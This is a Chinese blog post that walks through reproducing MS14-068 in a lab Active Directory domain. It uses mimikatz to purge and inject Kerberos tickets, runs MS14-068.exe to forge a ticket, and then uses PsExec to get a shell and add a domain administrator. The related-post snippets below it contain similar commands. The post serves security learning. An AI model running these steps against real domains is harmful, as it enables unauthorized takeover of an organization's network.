ms14-068复现

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量261 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54806373/article/details/121400280
版权

MS14-068复现

域控制器:windows2008 R2 test.com 192.168.146.138

域内机器:Windows7

1.查看漏洞是否存在

systeminfo

image-20211118083344691

发现没有打相关补丁,漏洞存在

2.配置windows sever2008 R2

打开cmd输入

dcpromo

image-20211118083732751

安装完成后得到结果(详细过程见windows sever2008 R2环境配置)

image-20211118083557858

3.配置windows7

打开网络进行配置

image-20211118084204425

将DNS配置为Windows sever 2008R2的IP

image-20211118084252611

连接成功

image-20211118083951236

注:需要先在windows sever2008 R2中创建一个普通用户,然后在windows7中登录该用户

4.漏洞利用

用普通用户登录,测试访问域控的C盘共享

dir \\登录服务器.域\c$

image-20211118090133449

被拒绝

了使我们生成的票据起作用,首先我们需要将内存中已有的kerberos票据清除,清除方法使用mimikatz

kerberos::list

image-20211118100600252

kerberos::purge

image-20211118100646460

kerberos::list

image-20211118100727469

查看本机用户ID

whoani/all

image-20211118100830432

利用ms14-068.exe提权工具生成伪造的kerberos协议认证证书

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d 192.168.146.138

image-20211118103221324

得到票据

image-20211118103311270

注入票据

kerberos::ptc 票据位置

image-20211118105245605

再列出域控制器的C盘目录

image-20211118105824163

使用PSTools目录下的PsExec.exe获取shell:

image-20211118110516987

添加域管理员

image-20211118110825297

创建成功

漏洞复现完成
shell:

[外链图片转存中...(img-vQWVZd6H-1637217407316)]

添加域管理员
在这里插入图片描述

创建成功

漏洞复现完成

BUr-ry
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透--MS14-068复现
ximo的博客
04-11 316
漏洞概述 该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。 影响版本 全部版本Windows服务器 环境搭建 域:hack.com 域控:win 2008 R2 192.168.133.100 域内主机:win 7 192.168.133.101 复现过程 假设已经获得了域内主机win 7的控制权;查看用户是否为域用户: net user hack1 /domain 获取域控信息: net group "domain controllers" /domain pi
MS14-068漏洞复现
2ed
11-18 1353
背景 微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft WindowsKerberosKDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变...
MS14-068复现
https://www.cnblogs.com/zpchcbd/
09-15 693
kerberos认证流程非常的重要 1、生成TGT: net config workstation ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top 生成的票据: 2、注入TGT: 1)先查看自己的klist 如...
MS14-068(域提权)漏洞复现
weixin_50985113的博客
06-29 713
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
复现MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 437
MS14-068
MS14-068 复现
prettyX的博客
12-25 637
前言 1、Kerberos协议在过去几年被曝光了一些漏洞,一个影响最大的漏洞是MS14-068。 2、漏洞效果:域用户利用该漏洞可以获取域管理员权限。 3、MS14-068 CVE编号:CVE-2014-6324;补丁号为KB3011780。 环境准备 域环境:本地搭建 域用户主机:Win7 sp1 32位 工具:mimikatz、ms14-068.exe 复现 1、域控漏...
MS14-068 漏洞复现
box
03-24 861
0x00 漏洞成因 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证 简单来说就是: windows域中使用kerberos协议过程中,为了让SS服务器判断Client是否有权限访问服务,引入了PAC机制。构造PAC也是这个漏洞的根本。 在请求AS时,
ms08-067调研加完全复现
08-25
对windows的2008年的经典漏洞ms08-067进行了复现,每一步我都给出了配图,适合新手学习和使用。原创者:x
MS14-068漏洞复现
一纸荒芜的博客
08-26 3179
ms14-068漏洞复现
域渗透☀️MS14-068☀️漏洞复现
君莫hacker的博客
09-11 861
目录0x01 漏洞介绍0x02 环境准备0x03 漏洞复现1. 查看当前用户是否为域用户2. 获取域控信息3. 查看目前权限4. “MS14-068” 工具生成票据5. 打开mimikatz,注入票据6. 验证权限是否提升7. 使用PsExec.exe获取一个交互式shell8. 创建用户,并添加至域管理员组 0x01 漏洞介绍 漏洞概述: 该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。 漏洞编号 CVE-2014-6324 受影响版本 全部版本Windows服务器
登录安全分析报告:小米官网注册
Explinks的博客
05-29 933
图形验证及交互验证方式的安全性到底如何?请看具体分析。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 994
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 273
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 671
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
ms09-001复现结果
09-12
在ms09-001复现过程中,首先需要构建一个与漏洞相关的实验环境。这个环境通常是在实验室或虚拟机中搭建的,其中包括运行受影响版本的Windows操作系统以及相关的文件传输协议服务。 接下来,我们需要利用已经公开的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值